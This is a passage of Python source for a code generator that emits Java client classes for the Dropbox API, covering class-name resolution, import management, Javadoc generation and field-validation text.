# Find/Replace ".Tag" with ".TagObject" due to name conflict WEBSERVDB-18031
if fq_name.endswith(".Tag"):
fq_name = fq_name.replace(".Tag", ".TagObject")
self._fq_name = fq_name
self._generics = generics
for g in generics:
assert isinstance(g, (JavaClass, str)), repr(generics)
if isinstance(g, str):
assert '.' not in g, repr(generics)
package_parts = fq_name.split('.')
# Handle nested classes, like:
#
# com.foo.Bar.Wop
#
# name => Wop
# package => com.foo
# static_name => Bar.Wop
# import_name => com.foo.Bar
#
self._name = package_parts[-1]
for i, part in enumerate(package_parts):
is_last = i == len(package_parts) - 1
is_class_name = (part and part[0].isupper())
if is_last or is_class_name:
self._package = '.'.join(package_parts[:i])
self._static_name = '.'.join(package_parts[i:])
self._import_name = '.'.join(package_parts[:i + 1])
break
@classmethod
def from_str(cls, val):
"""
Returns an instance of JavaClass from its string representation produced using str(..).
"""
matcher = re.match(r'^(?P<fq_name>[^< ]+)(?:<(?P<generics>.*)>)?$', val)
if matcher is None:
raise ValueError("Malformed Java class: %s" % val)
fq_name = matcher.group('fq_name')
generics_group = matcher.group('generics')
generics = []
if generics_group is not None:
for gtype in generics_group.split(','):
gtype = gtype.strip()
if not gtype:
raise ValueError("Malformed Java class: %s" % val)
if '.' in gtype:
generics.append(cls.from_str(gtype))
else:
generics.append(gtype)
return JavaClass(fq_name, generics=generics)
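    # Illustrative round-trip (hypothetical names):
    #
    #   c = JavaClass.from_str('java.util.Map<String, com.foo.Bar>')
    #   c.name     -> 'Map'
    #   c.package  -> 'java.util'
    #   str(c)     -> 'java.util.Map<String, com.foo.Bar>'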
@property
def fq(self):
"""
Fully-qualified Java class name.
Example: com.foo.Bar.Wop => com.foo.Bar.Wop
:rtype: str
"""
return self._fq_name
@property
def name(self):
"""
Short name of Java class.
Example: com.foo.Bar.Wop => Wop
:rtype: str
"""
return self._name
@property
def name_with_generics(self):
if self._generics and all('.' in g for g in self._generics):
return '{}<{}>'.format(self._name, ', '.join(self._generics))
else:
return self._name
def resolved_name(self, current_class, imports, generics=False):
"""
Returns the appropriate name to use when referencing this class from within the given class.
Examples:
current_class => JavaClass("com.dropbox.files.C")
imports => {JavaClass("com.dropbox.common.A"), JavaClass("java.util.B")}
"com.dropbox.files.D" => "D" # package local
"com.dropbox.common.E" => "com.dropbox.common.E" # not imported
"com.dropbox.common.A" => "A" # already imported
"com.dropbox.files.C.X" => "X" # nested inner class
"java.util.B.Y" => "B.Y" # nested class outside current class
Args:
current_class(JavaClass): class that will reference this class
imports(set[JavaClass]): set of full-qualified classes that have been imported
:rtype: str
"""
resolved = self._resolved_name(current_class, imports)
if generics and self._generics:
resolved_generics = ', '.join(
g.resolved_name(current_class, imports, generics) if isinstance(g, JavaClass) else g
for g in self._generics
)
return '{}<{}>'.format(resolved, resolved_generics)
else:
return resolved
def _resolved_name(self, current_class, imports):
# no package, so just return the name
if not self._package:
return self._name
assert isinstance(current_class, JavaClass), repr(current_class)
assert imports is not None
# inner class? (e.g. com.foo.CommitInfo.Builder)
if self._fq_name.startswith(current_class._fq_name + '.'):
return self._fq_name[len(current_class._fq_name) + 1:]
# package-local class? we don't need to import these
if self._package == current_class.package:
return self._static_name
# check if we already imported this name into our current context
if self.import_class in imports:
return self._static_name
# last resort, display fully-qualified name
return self._fq_name
@property
def package(self):
"""
Name of package containing this Java class.
Example: com.foo.Bar.Wop => com.foo
:rtype: str
"""
return self._package
@property
def is_nested(self):
"""
Whether or not this class is nested within another Java class.
:rtype: bool
"""
return self._static_name != self._name
@property
def import_class(self):
"""
Returns the root class containing this nested class. Example:
com.foo.Bar => com.foo.Bar
com.foo.Bar.A => com.foo.Bar
com.foo.Bar.A.B => com.foo.Bar
The returned class is the class you would import if you needed access to this class.
:rtype: JavaClass
"""
return JavaClass(self._import_name)
def __repr__(self):
return '{}({})'.format(type(self), str(self))
def __str__(self):
if self._generics:
return '{}<{}>'.format(self._fq_name, ', '.join(str(g) for g in self._generics))
else:
return self._fq_name
def __hash__(self):
return hash(self._fq_name)
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
if isinstance(other, JavaClass):
return self._fq_name == other._fq_name
return False
def __lt__(self, other):
assert isinstance(other, type(self)), repr(other)
return self._fq_name < other._fq_name
@total_ordering
class Visibility:
def __init__(self, rank, name, modifier):
self._rank = rank
self._name = name
self._modifier = modifier
@property
def name(self):
return self._name
@property
def is_visible(self):
return self._modifier is not None
@property
def modifier(self):
if not self.is_visible:
raise ValueError("Not visible")
return self._modifier
@classmethod
def from_name(cls, name):
for value in cls._VALUES:
if value.name == name:
return value
raise ValueError("Unrecognized name: %s" % name)
def __repr__(self):
return self._name
def __hash__(self):
return self._rank
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
if isinstance(other, type(self)):
return self._rank == other._rank
return False
def __lt__(self, other):
assert isinstance(other, type(self)), repr(other)
return self._rank < other._rank
Visibility.NONE = Visibility(0, 'NONE', None)
Visibility.PRIVATE = Visibility(1, 'PRIVATE', 'private')
Visibility.PACKAGE = Visibility(2, 'PACKAGE', '')
Visibility.PUBLIC = Visibility(3, 'PUBLIC', 'public')
Visibility._VALUES = (Visibility.NONE, Visibility.PRIVATE, Visibility.PACKAGE, Visibility.PUBLIC)
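# Illustrative: visibilities are totally ordered by rank, so escalating a data
# type's visibility can simply use max():
#
#   max(Visibility.PACKAGE, Visibility.PUBLIC)  -> Visibility.PUBLIC
#   Visibility.PRIVATE < Visibility.PACKAGE     -> True
#   Visibility.PACKAGE.modifier                 -> '' (package-private)
#   Visibility.NONE.modifier                    -> raises ValueError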
_CMDLINE_PARSER = argparse.ArgumentParser(prog='java-generator')
_CMDLINE_PARSER.add_argument('--package', type=str, required=True,
help='base package name')
_CMDLINE_PARSER.add_argument('--client-class', type=str, default='StoneClient',
help='Name of client class to generate.')
_CMDLINE_PARSER.add_argument('--client-javadoc', type=str,
default='Auto-generated Stone client',
help='Class Javadoc to use for auto-generated client.')
_CMDLINE_PARSER.add_argument('--requests-classname-prefix', type=str, default=None,
help=('Prefix to prepend to the per-namespace requests classes. '
'Defaults to using the name of the client class.'))
_CMDLINE_PARSER.add_argument('--data-types-only', action="store_true", default=False,
help='Generate all data types but no routes or clients.')
_CMDLINE_PARSER.add_argument('--javadoc-refs', type=str, default=None,
help='Path to Javadoc references file. If a file exists at this ' +
'path, it will be loaded and used for generating correct Javadoc ' +
'references based off previous generator runs. This is useful when ' +
'generating multiple clients for a single project. ' +
                                  'If this argument is specified, an updated Javadoc references file ' +
'will be saved to the given location. It is OK if this file does not ' +
'exist.')
_CMDLINE_PARSER.add_argument('--unused-classes-to-generate', default=None, help='Specify types ' +
'that we want to generate regardless of whether they are used.')
class JavaCodeGenerator(CodeBackend):
cmdline_parser = _CMDLINE_PARSER
def generate(self, api):
"""
Toplevel code generation method.
This is called by stone.cli.
"""
generator = JavaCodeGenerationInstance(self, api)
if self.args.data_types_only:
assert self.args.javadoc_refs is None, "Cannot specify --javadoc-refs with --data-types-only"
generator.generate_data_types()
else:
generator.generate_all()
class JavaImporter:
def __init__(self, current_class, j):
assert isinstance(current_class, JavaClass), repr(current_class)
assert isinstance(j, JavaApi), repr(j)
self._class = current_class
self._j = j
self._imports = set()
@property
def imports(self):
return frozenset(self._imports)
def add_imports(self, *imports):
"""
Adds the fully-qualified Java class names to the set of imports for the currently generated
class.
Imports must be fully-qualified class name strings (e.g. ``"com.foo.Bar"``) or JavaClass
instances.
"""
assert all(isinstance(i, (str, JavaClass)) for i in imports), repr(imports)
def convert(val):
if isinstance(val, JavaClass):
return val
elif isinstance(val, str):
return JavaClass(val)
else:
raise AssertionError(repr(type(val)))
# convert all imports to JavaClass instances
imports = [convert(i) for i in imports]
# remove imports that are missing package (e.g. long, Integer,
# etc) and imports from java.lang
imports = [
i for i in imports
if i.package and i.package != 'java.lang'
]
current_class_prefix = self._class.fq + '.'
existing_names = {i.name: i for i in self._imports}
# avoid issues where we import a class with the same name as us
existing_names[self._class.name] = self._class
for import_ in imports:
# resolve nested classes to their root containing class
import_ = import_.import_class
# already imported or local name (not fully qualified)
if import_ in self._imports or not import_.package:
continue
# ignore nested classes inside our current class
if import_ == self._class:
continue
# is this import in our existing names? make sure we choose the most "valid" import
# between the two:
if import_.name in existing_names:
# we always prefer package-local imports, otherwise we can't determine at name
# resolution time whether a package-local class needs to be fully-qualified or
# not. This means we essentially block all imports that clash with package-local
# class names.
if import_.package == self._class.package:
existing_import = existing_names[import_.name]
self._imports.remove(existing_import)
existing_names[import_.name] = import_
self._imports.add(import_)
else:
# leave the existing import alone
pass
else:
# new import
existing_names[import_.name] = import_
self._imports.add(import_)
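    # Illustrative (hypothetical classes): with current class com.dropbox.files.C,
    #
    #   add_imports('com.dropbox.common.Metadata', 'java.util.List',
    #               'com.dropbox.files.C.Builder', 'long')
    #
    # keeps com.dropbox.common.Metadata and java.util.List, and drops both the
    # nested Builder (local to the current class) and the package-less 'long'.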
def add_imports_for_namespace(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
self.add_imports(
'com.dropbox.core.DbxException',
'com.dropbox.core.DbxWrappedException',
'com.dropbox.core.http.HttpRequestor',
'com.dropbox.core.v2.DbxRawClientV2',
'java.util.HashMap',
'java.util.Map',
)
for route in namespace.routes:
self.add_imports_for_route(route)
def add_imports_for_route(self, route):
assert isinstance(route, ApiRoute), repr(route)
j = self._j
self._add_imports_for_data_type(route.arg_data_type)
self._add_imports_for_data_type(route.result_data_type)
self._add_imports_for_data_type_exception(route.error_data_type)
if j.has_builder(route) and j.has_arg(route) and j.has_builder(route.arg_data_type):
self._add_imports_for_data_type_builder(route.arg_data_type)
if is_struct_type(route.arg_data_type):
if j.has_builder(route):
fields = route.arg_data_type.all_required_fields
else:
fields = route.arg_data_type.all_fields
for field in fields:
self.add_imports_for_field(field)
if j.request_style(route) == 'upload':
self.add_imports('com.dropbox.core.DbxUploader')
if j.has_builder(route):
self.add_imports('com.dropbox.core.v2.DbxUploadStyleBuilder')
elif j.request_style(route) == 'download':
self.add_imports(
'com.dropbox.core.DbxDownloader',
'com.dropbox.core.v2.DbxDownloadStyleBuilder',
'java.util.Collections',
'java.util.List',
'java.util.Map',
)
def add_imports_for_route_builder(self, route):
assert isinstance(route, ApiRoute), repr(route)
j = self._j
assert j.has_builder(route), repr(route)
if j.has_arg(route) and j.has_builder(route.arg_data_type):
self._add_imports_for_data_type_builder(route.arg_data_type)
self._add_imports_for_data_type(route.result_data_type)
self._add_imports_for_data_type_exception(route.error_data_type)
namespace = j.route_namespace(route)
self.add_imports(
j.java_class(namespace),
'com.dropbox.core.DbxException',
)
for field in route.arg_data_type.all_optional_fields:
self.add_imports_for_field(field)
if j.request_style(route) == 'download':
self.add_imports(
'com.dropbox.core.v2.DbxDownloadStyleBuilder',
'com.dropbox.core.DbxDownloader',
)
elif j.request_style(route) == 'upload':
self.add_imports('com.dropbox.core.v2.DbxUploadStyleBuilder')
def add_imports_for_route_uploader(self, route):
self.add_imports(
'com.dropbox.core.DbxWrappedException',
'com.dropbox.core.DbxUploader',
'com.dropbox.core.http.HttpRequestor',
'java.io.IOException',
)
self._add_imports_for_data_type(route.result_data_type)
self._add_imports_for_data_type_exception(route.error_data_type)
def add_imports_for_data_type(self, data_type, include_serialization=True):
assert isinstance(data_type, DataType), repr(data_type)
assert is_user_defined_type(data_type), repr(data_type)
j = self._j
# for hash code computation
if data_type.fields or (is_union_type(data_type) and not j.is_enum(data_type)):
self.add_imports('java.util.Arrays')
self._add_imports_for_data_type(data_type)
if include_serialization:
self._add_imports_for_data_type_serializers(data_type)
for field in data_type.all_fields:
self.add_imports_for_field(field)
# for regex pattern validation
if is_string_type(field.data_type) and field.data_type.pattern is not None:
self.add_imports('java.util.regex.Pattern')
# check if we need to import parent type
if is_struct_type(data_type) and data_type.parent_type:
self._add_imports_for_data_type(data_type.parent_type)
def add_imports_for_exception_type(self, data_type):
j = self._j
self.add_imports(
'com.dropbox.core.DbxApiException',
'com.dropbox.core.LocalizedText',
j.java_class(data_type),
)
def add_imports_for_field(self, field):
self._add_imports_for_data_type(field.data_type)
def _add_imports_for_data_type(self, data_type):
j = self._j
if is_user_defined_type(data_type):
self.add_imports(j.java_class(data_type))
else:
java_type = _TYPE_MAP_UNBOXED.get(data_type.name)
if java_type and '.' in java_type:
self.add_imports(java_type)
if is_list_type(data_type) or is_nullable_type(data_type):
self._add_imports_for_data_type(data_type.data_type)
elif is_map_type(data_type):
self._add_imports_for_data_type(data_type.value_data_type)
elif is_timestamp_type(data_type):
self.add_imports('com.dropbox.core.util.LangUtil')
def _add_imports_for_data_type_builder(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
j = self._j
self.add_imports(j.builder_class(data_type))
def _add_imports_for_data_type_exception(self, data_type):
j = self._j
if is_void_type(data_type):
self.add_imports('com.dropbox.core.DbxApiException')
else:
self.add_imports(
j.java_class(data_type),
j.exception_class(data_type),
)
def _add_imports_for_data_type_serializers(self, data_type):
self.add_imports(
'java.io.IOException',
'com.fasterxml.jackson.core.JsonGenerationException',
'com.fasterxml.jackson.core.JsonGenerator',
'com.fasterxml.jackson.core.JsonParseException',
'com.fasterxml.jackson.core.JsonParser',
'com.fasterxml.jackson.core.JsonToken',
'com.dropbox.core.stone.StoneSerializers',
'com.dropbox.core.stone.StoneDeserializerLogger',
)
if is_struct_type(data_type):
self.add_imports('com.dropbox.core.stone.StructSerializer')
elif is_union_type(data_type):
self.add_imports('com.dropbox.core.stone.UnionSerializer')
def __repr__(self):
return '{}(class={},imports={})'.format(type(self).__name__, self._class, self._imports)
class JavaClassWriter:
def __init__(self, g, j, refs, java_class, stone_element=None, package_doc=None):
assert isinstance(java_class, JavaClass), repr(java_class)
assert java_class.package, repr(java_class)
self.importer = JavaImporter(java_class, j)
self._g = g
self._j = j
self._refs = refs
self._class = java_class
self._stone_element = stone_element
self._package_doc = package_doc
if package_doc:
assert java_class.name == 'package-info', "Only package-info.java files can contain package Javadoc"
def _mkdirs(self, path):
if not os.path.isdir(path):
self._g.logger.info('Creating directory %s', path)
os.makedirs(path)
def __enter__(self):
components = self._class.import_class.fq.split('.')
path = os.path.join(*components)
self._mkdirs(os.path.dirname(path))
self._enter_ctx = self._g.output_to_relative_path(path + '.java')
self._enter_ctx.__enter__()
self._emit_header()
if self._package_doc:
self.javadoc(self._package_doc)
self.out('package %s;', self._class.package)
self.out('')
return self
def __exit__(self, exc_type, exc_value, traceback):
ret = self._enter_ctx.__exit__(exc_type, exc_value, traceback)
self._enter_ctx = None
return ret
def fmt(self, fmt_str, *args, **kwargs):
assert isinstance(fmt_str, str), repr(fmt_str)
generics = kwargs.get('generics', True)
# resolve JavaClass to appropriate names based on our current imports
resolved_args = tuple(
self.resolved_class(a, generics=generics) if isinstance(a, JavaClass) else a
for a in args
)
return fmt_str % resolved_args
def out(self, fmt_str, *args, **kwargs):
self._g.emit(self.fmt(fmt_str, *args), **kwargs)
def block(self, fmt_str, *args, **kwargs):
return self._g.block(self.fmt(fmt_str, *args).strip(), **kwargs)
@contextmanager
def conditional_block(self, predicate, fmt_str, *args):
if predicate:
with self.block(fmt_str, *args):
yield
else:
yield
def class_block(self, element, visibility=Visibility.PUBLIC, parent_class=None):
assert isinstance(element, (JavaClass, StoneType)), repr(element)
assert visibility.is_visible, repr((element, visibility))
j = self._j
java_class = j.java_class(element) if isinstance(element, StoneType) else element
modifiers = [visibility.modifier]
class_type = 'class'
class_name = java_class.name_with_generics
inheritance = parent_class
if java_class.is_nested:
modifiers.append('static')
if isinstance(element, DataType):
data_type = element
if j.is_enum(data_type):
class_type = 'enum'
elif is_union_type(data_type):
modifiers.append('final')
elif is_struct_type(data_type) and data_type.parent_type:
assert parent_class is None, repr((data_type, parent_class))
inheritance = j.java_class(data_type.parent_type)
if inheritance:
return self.block('%s %s %s extends %s', ' '.join(modifiers), class_type, class_name, inheritance)
else:
return self.block('%s %s %s', ' '.join(modifiers), class_type, class_name)
def resolved_class(self, val, generics=True):
if isinstance(val, str):
val = JavaClass(val)
else:
assert isinstance(val, JavaClass), repr(val)
return val.resolved_name(self._class, self.importer.imports, generics=generics)
def _emit_header(self):
j = self._j
filenames = j.get_spec_filenames(self._stone_element) if self._stone_element else None
self.out('/* DO NOT EDIT */')
if filenames:
self.out('/* This file was generated from %s */' % ', '.join(filenames))
else:
self.out('/* This file was generated by Stone */')
self.out('')
def write_imports(self):
        # start off with all imports, then group into categories
imports = self.importer.imports
# remove package-local imports
imports = {
import_ for import_ in imports
if import_.package != self._class.package
}
# group all our project imports into one spot. use the first two package parts for root corp
# package (e.g. com.foo.core.v2 -> com.foo)
project_package_prefix = '.'.join(self._class.package.split('.', 2)[:2])
project_imports = {
import_ for import_ in imports
if import_.package.startswith(project_package_prefix)
}
imports = imports - project_imports
# now group the rest by the first package part
grouped = defaultdict(set)
for import_ in imports:
root = import_.package.split('.', 1)[0]
grouped[root].add(import_)
# now write out the groups in this order:
#
# project packages
# 3rd party packages
# java
# javax
if project_imports:
for import_ in sorted(project_imports):
self.out('import %s;', import_.import_class.fq)
java_imports = grouped.pop('java', set())
javax_imports = grouped.pop('javax', set())
needs_newline = bool(project_imports)
for _, imports in chain(sorted(grouped.items()), [
('java', java_imports),
('javax', javax_imports)
]):
if imports:
if needs_newline:
self.out('')
needs_newline = True
for import_ in sorted(imports):
self.out('import %s;', import_.import_class.fq)
def java_default_value(self, field):
assert isinstance(field, Field), repr(field)
assert field.has_default, repr(field)
return self.java_value(field.data_type, field.default)
def java_value(self, data_type, stone_value):
assert isinstance(data_type, DataType), repr(data_type)
j = self._j
if data_type.name == 'Boolean':
return 'true' if stone_value else 'false'
elif data_type.name == 'String':
return self.fmt('"%s"', stone_value.replace('\\', '\\\\').replace('"', '\\"'))
elif data_type.name == 'Float32':
return repr(stone_value) + 'f' # append a f at the end for float value
elif data_type.name == 'Float64':
return repr(stone_value) # Because str() drops the last few digits.
elif data_type.name in ('Int64', 'UInt64', 'UInt32'):
return str(stone_value) + 'L' # Need exact type match for boxed values.
elif is_union_type(data_type):
assert isinstance(stone_value, TagRef), (data_type, stone_value)
assert data_type == stone_value.union_data_type, (data_type, stone_value)
for field in data_type.all_fields:
if field.name == stone_value.tag_name:
if j.field_static_instance(field):
value = self.fmt('%s.%s', j.java_class(data_type), j.field_static_instance(field))
else:
assert j.field_factory_method(field)
value = self.fmt('%s.%s()', j.java_class(data_type), j.field_factory_method(field))
return value
else:
assert False, "Could not find tag '{}' in '{}'".format(stone_value.tag_name, data_type)
else:
return str(stone_value)
def java_serializer(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
if is_user_defined_type(data_type):
serializer_class = self._j.serializer_class(data_type)
return self.fmt('%s.INSTANCE', serializer_class)
else:
serializers_class = JavaClass('com.dropbox.core.stone.StoneSerializers')
if is_nullable_type(data_type) and is_struct_type(data_type.data_type):
return self.fmt('%s.nullableStruct(%s)',
serializers_class, self.java_serializer(data_type.data_type))
elif is_nullable_type(data_type):
return self.fmt('%s.nullable(%s)',
serializers_class, self.java_serializer(data_type.data_type))
elif is_list_type(data_type):
# TODO: also support passing collapsed to list serializer
return self.fmt('%s.list(%s)',
serializers_class, self.java_serializer(data_type.data_type))
elif is_map_type(data_type):
return self.fmt('%s.map(%s)',
serializers_class, self.java_serializer(data_type.value_data_type))
else:
return self.fmt('%s.%s()', serializers_class, camelcase(data_type.name))
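    # Illustrative mapping (FooStruct is a hypothetical user-defined type):
    #
    #   String            -> StoneSerializers.string()
    #   Nullable(UInt64)  -> StoneSerializers.nullable(StoneSerializers.uInt64())
    #   List(FooStruct)   -> StoneSerializers.list(<FooStruct serializer>.INSTANCE)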
def javadoc(self, doc,
stone_elem=None,
fields=(),
params=(),
returns=None,
throws=(),
deprecated=None,
allow_defaults=True):
# convenience so we can do "javadoc(field)"
if isinstance(doc, StoneType):
assert stone_elem is None, repr(stone_elem)
stone_elem = doc
assert hasattr(stone_elem, "doc"), repr(stone_elem)
doc = stone_elem.doc
# apply default catch-all documentation to all fields
if not doc and isinstance(stone_elem, UnionField):
if stone_elem == self._j.field_containing_data_type(stone_elem).catch_all_field:
doc = _CATCH_ALL_DOC
doc = doc or ''
assert isinstance(doc, str), repr((doc, stone_elem))
assert isinstance(stone_elem, StoneType) or stone_elem is None, repr(stone_elem)
assert isinstance(fields, Sequence), repr(fields)
assert all(isinstance(f, Field) for f in fields), repr(fields)
assert isinstance(params, (Sequence, OrderedDict)), repr(params)
assert isinstance(returns, (str, StoneType)) or returns is None, repr(returns)
assert isinstance(throws, (Sequence, OrderedDict)), repr(throws)
assert isinstance(deprecated, (ApiRoute, bool)) or deprecated is None, repr(deprecated)
# auto-detect deprecated values
if deprecated is None and stone_elem is not None:
if isinstance(stone_elem, ApiRoute):
deprecation_info = stone_elem.deprecated
if deprecation_info is not None:
deprecated = deprecation_info.by or True
elif isinstance(stone_elem, StructField):
deprecated = stone_elem.deprecated
else:
assert not hasattr(stone_elem, "is_deprecated"), repr(stone_elem)
params_doc = self._javadoc_fields(fields, stone_elem, allow_defaults=allow_defaults)
params_doc.update(self._translate_ordered_collection(params, stone_elem))
if isinstance(returns, StoneType):
returns_doc = self._translate_stone_doc(returns.doc, returns) if hasattr(returns, 'doc') else ''
else:
returns_doc = self._translate_stone_doc(returns, stone_elem)
throws_doc = self._translate_ordered_collection(throws, stone_elem)
deprecated_doc = self._javadoc_deprecated(deprecated)
requires_validation = any(self._field_validation_requirements(f) for f in fields)
if requires_validation:
exception = "IllegalArgumentException"
if exception in throws_doc:
throws_doc[exception] += ". Also thrown if any argument does not meet its preconditions."
else:
throws_doc[exception] = "If any argument does not meet its preconditions."
return self._generate_javadoc_raw(
self._translate_stone_doc(doc, stone_elem),
params=params_doc,
returns=returns_doc,
throws=throws_doc,
deprecated=deprecated_doc,
)
def throws(self, field, value_name=None):
assert isinstance(field, Field), repr(field)
assert value_name is None or isinstance(value_name, str), repr(value_name)
reasons = self._field_validation_requirements(field, as_failure_reasons=True)
throws = OrderedDict()
if reasons:
reasons_list = oxford_comma_list(reasons, conjunction='or')
throws["IllegalArgumentException"] = "if {{@code {}}} {}.".format(value_name, reasons_list)
return throws
def javadoc_ref(self, element, context=None, builder=False):
assert isinstance(element, (JavaClass, StoneType, JavaReference)), repr(element)
assert isinstance(context, StoneType) or context is None, repr(context)
j = self._j
if isinstance(element, JavaClass):
ref = self.fmt("{@link %s}", element)
elif isinstance(element, (ApiRoute, RouteReference)):
route_ref = self._refs.route(element) if isinstance(element, ApiRoute) else element
ref = self._javadoc_route_ref(route_ref, builder=builder)
elif isinstance(element, (DataType, DataTypeReference)):
if isinstance(element, DataType):
if is_user_defined_type(element):
data_type_ref = self._refs.data_type(element)
ref = self._javadoc_data_type_ref(data_type_ref, builder=builder)
else:
ref = self.fmt("{@link %s}", j.java_class(element, generics=False))
else:
data_type_ref = element
ref = self._javadoc_data_type_ref(data_type_ref, builder=builder)
elif isinstance(element, (Field, FieldReference)):
# we need a context for union fields since we copy fields from parents into their
# subclasses. Otherwise, we may make a reference to a field in a non-existing class or
# incorrectly assume the field is an enum constant when it isn't.
field_ref = self._refs.field(element, context) if isinstance(element, Field) else element
ref = self._javadoc_field_ref(field_ref)
else:
raise AssertionError(repr(element))
return sanitize_javadoc(ref)
def _generate_javadoc_raw(self, doc, params=None, returns=None, throws=None, deprecated=None):
        # deprecated can be an empty string, which means a @deprecated tag with no doc text
if not any((doc, params, returns, throws, deprecated is not None)):
return
prefix = ' * '
attr_doc_prefix = prefix + (' ' * 4)
def emit_attrs(tag, attrs):
if attrs:
self.out(prefix.rstrip())
attr_prefix = ''.join((prefix, tag, ' '))
for attr_name, attr_doc in attrs.items():
# Javadoc complains about tags that are missing documentation, except for
# @deprecated
if not attr_doc.strip():
if tag == '@deprecated':
self._g.emit_wrapped_text(
tag,
initial_prefix=prefix,
subsequent_prefix=attr_doc_prefix)
continue
if attr_name:
doc_text = ' '.join((attr_name, attr_doc))
else:
doc_text = attr_doc
self._g.emit_wrapped_text(
collapse_whitespace(doc_text),
initial_prefix=attr_prefix,
subsequent_prefix=attr_doc_prefix
)
self.out('/**')
if doc:
first_paragraph = True
for paragraph in split_paragraphs(doc.strip()):
if not first_paragraph:
self.out(prefix.rstrip())
if paragraph:
paragraph = ''.join(('<p> ', paragraph, ' </p>'))
else:
first_paragraph = False
self._g.emit_wrapped_text(paragraph, initial_prefix=prefix, subsequent_prefix=prefix)
emit_attrs('@param', params)
emit_attrs('@return', {"": returns} if returns else None)
emit_attrs('@throws', throws)
# deprecated can be empty string, which still means we should emit
emit_attrs('@deprecated', {"": deprecated} if deprecated is not None else None)
self.out(' */')
# compiler requires a separate annotation outside the javadoc to display warnings about
# using obsolete APIs.
if deprecated is not None:
self.out('@Deprecated')
def _javadoc_fields(self, fields, stone_elem, allow_defaults=True):
j = self._j
params = OrderedDict()
for field in fields:
assert isinstance(field, Field), repr(field)
containing_data_type = j.field_containing_data_type(field)
param_name = j.param_name(field)
param_stone_doc = field.doc or ''
is_catch_all = is_union_type(containing_data_type) and field == containing_data_type.catch_all_field
if not param_stone_doc and is_catch_all:
param_stone_doc = _CATCH_ALL_DOC
context = stone_elem if isinstance(stone_elem, DataType) and field in stone_elem.all_fields else field
param_doc = self._translate_stone_doc(param_stone_doc, field)
# add '.' at end of doc if we have a doc and its missing.
if param_doc.strip() and not param_doc.endswith('.'):
param_doc += '.'
preconditions = self._field_validation_requirements(field)
if preconditions:
param_doc += " Must %s." % oxford_comma_list(preconditions, conjunction='and')
if allow_defaults and isinstance(field, StructField) and field.has_default:
param_doc += " Defaults to {@code %s} when set to {@code null}." % (
self.java_default_value(field)
)
param_doc = param_doc.strip()
if param_doc:
params[param_name] = param_doc
return params
def _javadoc_deprecated(self, deprecated):
assert isinstance(deprecated, (ApiRoute, bool)) or deprecated is None, repr(deprecated)
if isinstance(deprecated, ApiRoute):
return 'use %s instead.' % self.javadoc_ref(deprecated)
elif isinstance(deprecated, bool) and deprecated:
return ''
else:
return None
def _translate_ordered_collection(self, collection, stone_elem):
assert isinstance(collection, (Sequence, types.GeneratorType, OrderedDict)), repr(collection)
if isinstance(collection, OrderedDict):
collection = collection.items()
return OrderedDict(
(param_name, self._translate_stone_doc(doc, stone_elem))
for param_name, doc in collection
)
def _field_validation_requirements(self, field, as_failure_reasons=False):
assert isinstance(field, Field), repr(field)
# field has no value
if is_void_type(field.data_type):
return None
data_type = field.data_type
nullable = is_nullable_type(data_type)
if nullable:
data_type = data_type.data_type
requirements = []
def add_req(precondition, failure_reason):
if as_failure_reasons:
requirements.append(failure_reason)
else:
requirements.append(precondition)
for condition, (precondition, failure_reason) in (
('min_items', ('contain at least %s items', 'has fewer than %s items')),
('max_items', ('contain at most %s items', 'has more than %s items')),
('min_value', ('be greater than or equal to %s', 'is less than %s')),
('max_value', ('be less than or equal to %s', 'is greater than %s')),
('min_length', ('have length of at least %s', 'is shorter than %s')),
('max_length', ('have length of at most %s', 'is longer than %s'))
):
if hasattr(data_type, condition):
val = getattr(data_type, condition)
if val is not None:
add_req(precondition % val, failure_reason % val)
if is_list_type(data_type) or is_map_type(data_type):
add_req('not contain a {@code null} item', 'contains a {@code null} item')
elif is_string_type(data_type) and data_type.pattern is not None:
pattern = sanitize_pattern(data_type.pattern)
add_req('match pattern "{@code %s}"' % pattern, 'does not match pattern "{@code %s}"' % pattern)
if not (nullable or self._j.is_java_primitive(data_type) or is_void_type(data_type)):
add_req('not be {@code null}', 'is {@code null}')
return requirements
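    # Illustrative (hypothetical field): for a required, non-nullable String
    # field with min_length=1, this would return preconditions such as
    #
    #   ['have length of at least 1', 'not be {@code null}']
    #
    # and the corresponding failure phrasings when as_failure_reasons=True.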
def _translate_stone_doc(self, doc, stone_elem=None):
assert isinstance(doc, str) or doc is None, repr(doc)
if doc:
handler = lambda tag, val: self._javadoc_ref_handler(tag, val, stone_elem=stone_elem)
return self._g.process_doc(sanitize_javadoc(doc), handler)
else:
return doc or ''
def _javadoc_ref_handler(self, tag, val, stone_elem=None):
"""
Args:
tag(str): Type of Stone doc reference being made
val(str): The Stone element reference
stone_elem(StoneType): The stone element where this doc is appearing. This
is the context for looking up references. For example, if we are handling
the doc of a struct field, the Field object would be `stone_elem`.
This allows us to look up relative references (e.g. reference another
field within the same containing struct).
"""
element = self._lookup_stone_ref(tag, val, stone_elem)
if element is None and tag in ('route', 'type', 'field'):
self._g.logger.warn('Unable to resolve Stone reference (:{}:`{}`) [ctx={}]'.format(tag, val, stone_elem))
return sanitize_javadoc('{@code %s}' % camelcase(val))
# use {@code ...} tag for unresolved references so we don't have broken links in our Javadoc
if tag == 'route':
ref = self._javadoc_route_ref(element)
elif tag == 'type':
ref = self._javadoc_data_type_ref(element)
elif tag == 'field':
ref = self._javadoc_field_ref(element)
elif tag == 'link':
anchor, link = val.rsplit(' ', 1)
# unsanitize from previous sanitize calls
anchor = unsanitize_javadoc(anchor)
# do not sanitize this HTML
return '<a href="{}">{}</a>'.format(link, anchor)
elif tag == 'val':
# Note that all valid Stone literals happen to be valid Java literals.
ref = '{@code %s}' % val
else:
assert False, 'Unsupported tag (:{}:`{}`)'.format(tag, val)
return sanitize_javadoc(ref)
def _lookup_stone_ref(self, tag, val, stone_elem):
assert isinstance(tag, str), repr(tag)
assert isinstance(val, str), repr(val)
assert isinstance(stone_elem, StoneType) or stone_elem is None, repr(stone_elem)
assert val, repr(val)
j = self._j
def resolve_fq_name(val, max_parts):
try:
parts = split_stone_name(val, max_parts)
except ValueError as e:
# mark tag as invalid... can't raise exception here since we don't validate stone docs
self._g.logger.warn('Malformed Stone reference value: `{}`. {}'.format(val, str(e)))
return None
else:
if stone_elem and None in parts:
context_parts = j.stone_fq_name(stone_elem).split('.')
